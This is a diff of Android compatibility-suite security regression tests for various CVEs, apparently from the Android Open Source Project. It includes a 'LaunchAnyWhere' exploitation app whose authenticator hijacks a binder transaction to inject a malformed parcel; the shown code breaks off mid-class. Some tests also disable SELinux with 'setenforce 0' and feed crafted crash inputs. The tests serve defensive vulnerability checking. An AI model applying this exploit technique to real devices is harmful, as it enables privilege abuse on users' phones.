+public class Poc17_06 extends SecurityTestCase {
+
+ /**
+ * b/36392138
+ */
+ @SecurityTest(minPatchLevel = "2017-06")
+ public void testPocCVE_2017_0647() throws Exception {
+ AdbUtils.pushResource("/CVE-2017-0647.zip", "/data/local/tmp/CVE-2017-0647.zip",
+ getDevice());
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runCommandLine(
+ "dex2oat " +
+ "--dex-file=/data/local/tmp/CVE-2017-0647.zip " +
+ "--oat-file=/data/local/tmp/out " +
+ "--base=0x50000000", getDevice());
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Zip: missed a central dir sig", logcatOut);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
index 1f9602a..29b7a39 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
@@ -24,7 +24,7 @@
/**
* b/35443725
**/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testPocCVE_2016_2109() throws Exception {
assertFalse("Overallocation detected!",
AdbUtils.runPocCheckExitCode("CVE-2016-2109",
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
index 987233d..1659397 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
@@ -24,7 +24,7 @@
/**
* b/63852675
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testPocCve_2017_6983() throws Exception {
// Error code of 139 represents segmentation fault
assertFalse("Segfault found",
@@ -57,7 +57,7 @@
* b/38195738
* b/36590192
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testPocBug_38195738() throws Exception {
if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
AdbUtils.runPocNoOutput("Bug-38195738", getDevice(), 60);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
index 8f1771b..cdeec39 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
@@ -24,7 +24,7 @@
/**
* b/36075131
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-11")
public void testPocCVE_2017_0859() throws Exception {
AdbUtils.runCommandLine("logcat -c", getDevice());
AdbUtils.pushResource("/cve_2017_0859.mp4", "/sdcard/cve_2017_0859.mp4", getDevice());
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
index 799e0b6..7c0936a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
@@ -24,7 +24,7 @@
/**
* b/38045794
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-12")
public void testPocCVE_2017_6262() throws Exception {
if(containsDriver(getDevice(),"/dev/dri/renderD128")) {
AdbUtils.runPocNoOutput("CVE-2017-6262", getDevice(), 900);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
index a0fd9c1..a4eb539 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
@@ -24,20 +24,20 @@
/**
* b/68953950
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
public void testPocCVE_2017_13232() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPocNoOutput("CVE-2017-13232", getDevice(), 60);
String logcatOutput = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatchesMultiLine(".*APM_AudioPolicyManager: getOutputForAttr\\(\\) "+
- "invalid attributes: usage=.{1,} content=.{1,} "+
- "flags=.{1,} tags=\\[.{256,}\\].*", logcatOutput);
+ assertNotMatchesMultiLine("APM_AudioPolicyManager: getOutputForAttr\\(\\) " +
+ "invalid attributes: usage=.{1,15} content=.{1,15} " +
+ "flags=.{1,15} tags=\\[A{256,}\\]", logcatOutput);
}
/**
* b/65853158
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
public void testPocCVE_2017_13273() throws Exception {
AdbUtils.runCommandLine("dmesg -c" ,getDevice());
AdbUtils.runCommandLine("setenforce 0",getDevice());
@@ -52,4 +52,3 @@
AdbUtils.runCommandLine("setenforce 1",getDevice());
}
}
-
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
index 6398164..a8af91a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
@@ -23,7 +23,7 @@
/**
* b/71389378
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-03")
public void testPocCVE_2017_13253() throws Exception {
String output = AdbUtils.runPoc("CVE-2017-13253", getDevice());
assertNotMatchesMultiLine(".*OVERFLOW DETECTED.*",output);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
new file mode 100644
index 0000000..9364d28
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
@@ -0,0 +1,41 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc18_05 extends SecurityTestCase {
+ /**
+ * b/70721937
+ * Does not require root but must be a hostside test to avoid a race
+ * condition
+ */
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void testPocCVE_2017_13315() throws Exception {
+ LaunchSomeWhere.launchSomeWhere("CVE_2017_13315", getDevice());
+ }
+
+ /**
+ * b/73085795
+ * Does not require root but must be a hostside test to avoid a race condition
+ */
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void testPocCVE_2017_13312() throws Exception {
+ LaunchSomeWhere.launchSomeWhere("CVE_2017_13312", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
index 6efaafd..4d8d73b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
@@ -25,7 +25,7 @@
/**
* b/76221123
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-07")
public void testPocCVE_2018_9424() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPoc("CVE-2018-9424", getDevice(), 60);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
new file mode 100644
index 0000000..0423b37
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
@@ -0,0 +1,48 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc18_10 extends SecurityTestCase {
+
+ /**
+ * b/111641492
+ */
+ @SecurityTest(minPatchLevel = "2018-10")
+ public void testPocCVE_2018_9515() throws Exception {
+ AdbUtils.runCommandLine("rm /sdcard/Android/data/CVE-2018-9515", getDevice());
+ AdbUtils.runCommandLine("mkdir /sdcard/Android/data/CVE-2018-9515", getDevice());
+ AdbUtils.runPocNoOutput("CVE-2018-9515", getDevice(), 300);
+ boolean vulnerableBecauseCrashed = getDevice().waitForDeviceNotAvailable(10_000);
+ if (vulnerableBecauseCrashed) {
+ // wait for device to come online so we can clean up
+ getDevice().waitForDeviceAvailable(120_000); // 2 minutes
+ }
+ AdbUtils.runCommandLine("rm -rf /sdcard/Android/data/CVE-2018-9515", getDevice());
+ }
+
+ /**
+ * b/111274046
+ */
+ @SecurityTest
+ public void testPocCVE_2018_9490() throws Exception {
+ int code = AdbUtils.runPocGetExitStatus("/data/local/tmp/CVE-2018-9490", getDevice(), 60);
+ assertTrue(code != 139); // 128 + signal 11
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_08.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
similarity index 66%
rename from hostsidetests/securitybulletin/src/android/security/cts/Poc16_08.java
rename to hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
index 5ed4c22..9e50e1e 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_08.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
@@ -18,15 +18,17 @@
import android.platform.test.annotations.SecurityTest;
+import static org.junit.Assert.*;
+
@SecurityTest
-public class Poc16_08 extends SecurityTestCase {
- /**
- * b/28026365
- */
- @SecurityTest
- public void testPocCVE_2016_2504() throws Exception {
- if (containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- AdbUtils.runPoc("CVE-2016-2504", getDevice(), 60);
+public class Poc18_11 extends SecurityTestCase {
+
+ /**
+ * b/111330641
+ */
+ @SecurityTest(minPatchLevel = "2018-11")
+ public void testPocCVE_2018_9525() throws Exception {
+ assertTrue(AdbUtils.runCommandGetExitCode(
+ "pm dump com.android.settings | grep SliceBroadcastReceiver", getDevice()) != 0);
}
- }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
index 24d1226..eea1380 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
@@ -26,7 +26,6 @@
import java.util.regex.Matcher;
import java.util.Map;
import java.util.HashMap;
-import com.android.ddmlib.MultiLineReceiver;
import com.android.ddmlib.Log;
public class SecurityTestCase extends DeviceTestCase {
@@ -35,28 +34,7 @@
private long kernelStartTime;
- private static final long LOW_MEMORY_DEVICE_THRESHOLD_KB = 1024 * 1024; // 1GB
- private boolean isLowMemoryDevice = false;
- private static Map<ITestDevice, OomCatcher> oomCatchers = new HashMap<>();
- private static Map<ITestDevice, Long> totalMemories = new HashMap<>();
- private enum OomBehavior {
- FAIL_AND_LOG, // normal behavior
- PASS_AND_LOG, // skip tests that oom low memory devices
- FAIL_NO_LOG, // tests that check for oom
- }
- private OomBehavior oomBehavior = OomBehavior.FAIL_AND_LOG; // accessed across threads
- private boolean oomDetected = false; // accessed across threads
-
- private static long getMemTotal(ITestDevice device) throws Exception {
- String memInfo = device.executeShellCommand("cat /proc/meminfo");
- Pattern pattern = Pattern.compile("MemTotal:\\s*(.*?)\\s*[kK][bB]");
- Matcher matcher = pattern.matcher(memInfo);
- if (matcher.find()) {
- return Long.parseLong(matcher.group(1));
- } else {
- throw new Exception("Could not get device memory total");
- }
- }
+ private HostsideOomCatcher oomCatcher = new HostsideOomCatcher(this);
/**
* Waits for device to be online, marks the most recent boottime of the device
@@ -71,35 +49,7 @@
//TODO:(badash@): Watch for other things to track.
// Specifically time when app framework starts
- // Singleton for caching device TotalMem to avoid and adb shell for every test.
- Long totalMemory = totalMemories.get(getDevice());
- if (totalMemory == null) {
- totalMemory = getMemTotal(getDevice());
- totalMemories.put(getDevice(), totalMemory);
- }
- isLowMemoryDevice = totalMemory < LOW_MEMORY_DEVICE_THRESHOLD_KB;
-
- // reset test oom behavior
- // Low memory devices should skip (pass) tests when OOMing and log so that the
- // high-memory-test flag can be added. Normal devices should fail tests that OOM so that
- // they'll be ran again with --retry. If the test OOMs because previous tests used the
- // memory, it will likely pass on a second try.
- synchronized (this) { // synchronized for oomBehavior and oomDetected.
- if (isLowMemoryDevice) {
- oomBehavior = OomBehavior.PASS_AND_LOG;
- } else {
- oomBehavior = OomBehavior.FAIL_AND_LOG;
- }
- oomDetected = false;
- }
-
- // Singleton OOM detection in separate persistent threads for each device.
- OomCatcher oomCatcher = oomCatchers.get(getDevice());
- if (oomCatcher == null || !oomCatcher.isAlive()) {
- oomCatcher = new OomCatcher();
- oomCatchers.put(getDevice(), oomCatcher);
- oomCatcher.start();
- }
+ oomCatcher.start();
}
/**
@@ -143,6 +93,8 @@
*/
@Override
public void tearDown() throws Exception {
+ oomCatcher.stop(getDevice().getSerialNumber());
+
getDevice().waitForDeviceAvailable(120 * 1000);
String uptime = getDevice().executeShellCommand("cat /proc/uptime");
assertTrue("Phone has had a hard reset",
@@ -152,20 +104,17 @@
//TODO(badash@): add ability to catch runtime restart
getDevice().disableAdbRoot();
- // pass, fail, or log based on the oom behavior
- synchronized (this) { // synchronized for oomDetected and oomBehavior
- if (oomDetected) {
- switch (oomBehavior) {
- case FAIL_AND_LOG:
- fail("The device ran out of memory.");
- return;
- case PASS_AND_LOG:
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, "Skipping test.");
- return;
- case FAIL_NO_LOG:
- fail();
- return;
- }
+ if (oomCatcher.isOomDetected()) {
+ switch (oomCatcher.getOomBehavior()) {
+ case FAIL_AND_LOG:
+ fail("The device ran out of memory.");
+ return;
+ case PASS_AND_LOG:
+ Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, "Skipping test.");
+ return;
+ case FAIL_NO_LOG:
+ fail();
+ return;
}
}
}
@@ -176,7 +125,7 @@
public void assertMatchesMultiLine(String pattern, String input) throws Exception {
assertTrue("Pattern not found: " + pattern,
- Pattern.compile(pattern).matcher(input).find());
+ Pattern.compile(pattern, Pattern.DOTALL|Pattern.MULTILINE).matcher(input).find());
}
public void assertNotMatches(String pattern, String input) throws Exception {
@@ -185,67 +134,6 @@
public void assertNotMatchesMultiLine(String pattern, String input) throws Exception {
assertFalse("Pattern found: " + pattern,
- Pattern.compile(pattern).matcher(input).find());
- }
-
- // Flag meaning the test will likely fail on devices with low memory.
- public void setHighMemoryTest() {
- synchronized (this) { // synchronized for oomBehavior
- if (isLowMemoryDevice) {
- oomBehavior = OomBehavior.PASS_AND_LOG;
- } else {
- oomBehavior = OomBehavior.FAIL_AND_LOG;
- }
- }
- }
-
- // Flag meaning the test uses the OOM catcher to fail the test because the test vulnerability
- // intentionally OOMs the device.
- public void setOomTest() {
- synchronized (this) { // synchronized for oomBehavior
- oomBehavior = OomBehavior.FAIL_NO_LOG;
- }
- }
-
- class OomCatcher extends Thread {
-
- @Override
- public void run() {
- MultiLineReceiver rcvr = new MultiLineReceiver() {
- private boolean isCancelled = false;
-
- public void processNewLines(String[] lines) {
- for (String line : lines) {
- if (Pattern.matches(".*lowmemorykiller.*", line)) {
- // low memory detected, reboot device to clear memory and pass test
- isCancelled = true;
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
- "lowmemorykiller detected; rebooting device.");
- synchronized (SecurityTestCase.this) { // synchronized for oomDetected
- oomDetected = true;
- }
- try {
- getDevice().rebootUntilOnline();
- updateKernelStartTime();
- } catch (Exception e) {
- Log.e(LOG_TAG, e.toString());
- }
- return; // we don't need to process remaining lines in the array
- }
- }
- }
-
- public boolean isCancelled() {
- return isCancelled;
- }
- };
-
- try {
- AdbUtils.runCommandLine("logcat -c", getDevice());
- getDevice().executeShellCommand("logcat", rcvr);
- } catch (Exception e) {
- Log.e(LOG_TAG, e.toString());
- }
- }
+ Pattern.compile(pattern, Pattern.DOTALL|Pattern.MULTILINE).matcher(input).find());
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMediaCodec.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMediaCodec.java
new file mode 100644
index 0000000..179cf24
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMediaCodec.java
@@ -0,0 +1,178 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License"); you may not
+ * use this file except in compliance with the License. You may obtain a copy of
+ * the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
+ * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
+ * License for the specific language governing permissions and limitations under
+ * the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.log.LogUtil.CLog;
+import android.platform.test.annotations.SecurityTest;
+import java.util.regex.Pattern;
+
+@SecurityTest
+public class TestMediaCodec extends SecurityTestCase {
+
+ final static int TIMEOUT_SEC = 9 * 60;
+ final static String RESOURCE_ROOT = "/";
+ final static String TMP_FILE_PATH = "/data/local/tmp/";
+ final static String HEVCDEC_BINARY = "testhevcdec";
+ final static String AVCDEC_BINARY = "testavcdec";
+ final static String MPEG2DEC_BINARY = "testmpeg2dec";
+
+ /***********************************************************
+ To prevent merge conflicts, add HEVC decoder tests for N
+ below this comment, before any existing test methods
+ ***********************************************************/
+
+
+ /***********************************************************
+ To prevent merge conflicts, add HEVC decoder tests for O
+ below this comment, before any existing test methods
+ ***********************************************************/
+
+
+ /***********************************************************
+ To prevent merge conflicts, add AVC decoder tests for N
+ below this comment, before any existing test methods
+ ***********************************************************/
+
+
+ /***********************************************************
+ To prevent merge conflicts, add AVC decoder tests for O
+ below this comment, before any existing test methods
+ ***********************************************************/
+
+
+ /***********************************************************
+ To prevent merge conflicts, add MPEG2 decoder tests for N
+ below this comment, before any existing test methods
+ ***********************************************************/
+
+
+ /***********************************************************
+ To prevent merge conflicts, add MPEG2 decoder tests for O
+ below this comment, before any existing test methods
+ ***********************************************************/
+
+
+ /**
+ * Calls runDecodeTest with HEVC decoder binary name as argument
+ *
+ * @param inputFiles files required as input
+ * @param arguments arguments for running the binary
+ * @param device device to be run on
+ * @param errPattern error patterns to be checked for
+ */
+ public static void runHevcDecodeTest(String inputFiles[], String arguments,
+ ITestDevice device, String errPattern[]) throws Exception {
+ runDecodeTest(HEVCDEC_BINARY, inputFiles, arguments, device, errPattern);
+ }
+
+ /**
+ * Calls runDecodeTest with MPEG2 decoder binary name as argument
+ *
+ * @param inputFiles files required as input
+ * @param arguments arguments for running the binary
+ * @param device device to be run on
+ * @param errPattern error patterns to be checked for
+ */
+ public static void runMpeg2DecodeTest(String inputFiles[], String arguments,
+ ITestDevice device, String errPattern[]) throws Exception {
+ runDecodeTest(MPEG2DEC_BINARY, inputFiles, arguments, device, errPattern);
+ }
+
+ /**
+ * Calls runDecodeTest with AVC decoder binary name as argument
+ *
+ * @param inputFiles files required as input
+ * @param arguments arguments for running the binary
+ * @param device device to be run on
+ * @param errPattern error patterns to be checked for
+ */
+ public static void runAvcDecodeTest(String inputFiles[], String arguments,
+ ITestDevice device, String errPattern[]) throws Exception {
+ runDecodeTest(AVCDEC_BINARY, inputFiles, arguments, device, errPattern);
+ }
+
+ /**
+ * Checks for linker errors
+ *
+ * @param binaryName name of the decoder binary
+ * @param logcat String to be parsed
+ */
+ public static boolean isLinkerErrorPresent(String binaryName, String logcat)
+ throws Exception {
+ return Pattern.compile(".*CANNOT LINK EXECUTABLE \""
+ + TMP_FILE_PATH + binaryName + "\".*",
+ Pattern.MULTILINE).matcher(logcat).find();
+ }
+
+ /**
+ * Checks for codec crash
+ *
+ * @param binaryName Name of the decoder binary
+ * @param errPattern error patterns to be checked for
+ * @param logcat String to be parsed
+ */
+ public static void checkCodecCrash(String binaryName, String errPattern[],
+ String logcat) throws Exception {
+ String genericCrashPattern[] = {
+ ".*name: " + binaryName + " >>> " + TMP_FILE_PATH + binaryName
+ + " <<<.*SIGABRT.*",
+ ".*name: " + binaryName + " >>> " + TMP_FILE_PATH + binaryName
+ + " <<<.*SIGSEGV.*"};
+ AdbUtils.checkCrash(genericCrashPattern, logcat);
+ if (errPattern != null) {
+ AdbUtils.checkCrash(errPattern, logcat);
+ }
+ }
+
+ /**
+ * Pushes input files, runs the PoC and checks for crash and hang
+ *
+ * @param binaryName name of the decoder binary
+ * @param inputFiles files required as input
+ * @param arguments arguments for running the binary
+ * @param device device to be run on
+ * @param errPattern error patterns to be checked for
+ */
+ public static void runDecodeTest(String binaryName, String inputFiles[],
+ String arguments, ITestDevice device, String errPattern[])
+ throws Exception {
+ if (inputFiles != null) {
+ for (int i = 0; i < inputFiles.length; i++) {
+ AdbUtils.pushResource(RESOURCE_ROOT + inputFiles[i],
+ TMP_FILE_PATH + inputFiles[i], device);
+ }
+ }
+ AdbUtils.runCommandLine("logcat -c", device);
+ AdbUtils.runWithTimeoutDeleteFiles(new Runnable() {
+ @Override
+ public void run() {
+ try {
+ AdbUtils.runPocNoOutput(binaryName, device,
+ TIMEOUT_SEC + 30, arguments);
+ } catch (Exception e) {
+ CLog.w("Exception: " + e.getMessage());
+ }
+ }
+ }, TIMEOUT_SEC * 1000, device, inputFiles);
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", device);
+ boolean linkerErrorFound = isLinkerErrorPresent(binaryName, logcatOut);
+ if (linkerErrorFound != true) {
+ checkCodecCrash(binaryName, errPattern, logcatOut);
+ }
+ }
+}
\ No newline at end of file
diff --git a/tests/tests/permission/testapps/Android.mk b/hostsidetests/securitybulletin/test-apps/Android.mk
similarity index 77%
rename from tests/tests/permission/testapps/Android.mk
rename to hostsidetests/securitybulletin/test-apps/Android.mk
index 9aaa6ac..f8d63a5 100644
--- a/tests/tests/permission/testapps/Android.mk
+++ b/hostsidetests/securitybulletin/test-apps/Android.mk
@@ -12,6 +12,12 @@
# See the License for the specific language governing permissions and
# limitations under the License.
-LOCAL_PATH:= $(call my-dir)
+LOCAL_PATH := $(call my-dir)
-include $(call all-makefiles-under,$(LOCAL_PATH))
+include $(CLEAR_VARS)
+
+# tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+
+# Build the test APKs using their own makefiles
+include $(call all-makefiles-under,$(LOCAL_PATH))
\ No newline at end of file
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/Android.mk b/hostsidetests/securitybulletin/test-apps/launchanywhere/Android.mk
similarity index 71%
copy from tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/Android.mk
copy to hostsidetests/securitybulletin/test-apps/launchanywhere/Android.mk
index 70a096e..226c360 100644
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/Android.mk
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/Android.mk
@@ -1,3 +1,4 @@
+#
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
@@ -12,18 +13,22 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
-LOCAL_PATH:= $(call my-dir)
+
+LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_MODULE_TAGS := tests
LOCAL_SDK_VERSION := current
-LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_PACKAGE_NAME := CtsHostLaunchAnyWhereApp
# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests cts_instant
-LOCAL_CERTIFICATE := cts/hostsidetests/appsecurity/certs/cts-testkey2
-LOCAL_PACKAGE_NAME := CtsAdversarialPermissionUserApp
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
-include $(BUILD_CTS_PACKAGE)
+LOCAL_PROGUARD_ENABLED := disabled
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/launchanywhere/AndroidManifest.xml
new file mode 100644
index 0000000..1553c92
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/AndroidManifest.xml
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2018 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.security.cts.launchanywhere"
+ android:versionCode="1"
+ android:versionName="1.0">
+
+ <application android:label="LaunchAnyWhere Exploitation App">
+ <activity android:name=".StartExploit">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <service android:name=".AuthenticatorService"
+ android:enabled="true"
+ android:exported="true">
+
+ <intent-filter>
+ <action android:name="android.accounts.AccountAuthenticator" />
+ </intent-filter>
+
+ <meta-data
+ android:name="android.accounts.AccountAuthenticator"
+ android:resource="@xml/launchanywhere_authenticator" />
+ </service>
+
+ </application>
+</manifest>
\ No newline at end of file
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/launchanywhere/res/xml/launchanywhere_authenticator.xml
similarity index 82%
rename from tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/res/values/strings.xml
rename to hostsidetests/securitybulletin/test-apps/launchanywhere/res/xml/launchanywhere_authenticator.xml
index 062b41c..bd8643f 100644
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/res/values/strings.xml
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/res/xml/launchanywhere_authenticator.xml
@@ -14,6 +14,7 @@
limitations under the License.
-->
-<resources xmlns:xliff="urn:oasis:names:tc:xliff:document:1.2">
- <string name="test_permission">Test Permission</string>
-</resources>
+<account-authenticator
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:accountType="com.launchanywhere"
+ />
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/Authenticator.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/Authenticator.java
new file mode 100644
index 0000000..536d9da
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/Authenticator.java
@@ -0,0 +1,180 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.IInterface;
+import android.os.Parcel;
+import android.os.RemoteException;
+
+import java.io.FileDescriptor;
+import java.lang.reflect.Field;
+
+public class Authenticator extends AbstractAccountAuthenticator {
+ static public IGenerateMalformedParcel exploit;
+
+ private int TRANSACTION_onResult;
+ private IBinder mOriginRemote;
+ private IBinder mProxyRemote = new IBinder() {
+ @Override
+ public String getInterfaceDescriptor() throws RemoteException {
+ return null;
+ }
+
+ @Override
+ public boolean pingBinder() {
+ return false;
+ }
+
+ @Override
+ public boolean isBinderAlive() {
+ return false;
+ }
+
+ @Override
+ public IInterface queryLocalInterface(String descriptor) {
+ return null;
+ }
+
+ @Override
+ public void dump(FileDescriptor fd, String[] args) throws RemoteException {}
+
+ @Override
+ public void dumpAsync(FileDescriptor fd, String[] args)
+ throws RemoteException {}
+
+ @Override
+ public boolean transact(int code, Parcel data, Parcel reply, int flags)
+ throws RemoteException {
+ if (code == TRANSACTION_onResult) {
+ data.recycle();
+ Intent payload = new Intent();
+ payload.setAction(Intent.ACTION_REBOOT);
+ data = exploit.generate(payload);
+ }
+
+ mOriginRemote.transact(code, data, reply, flags);
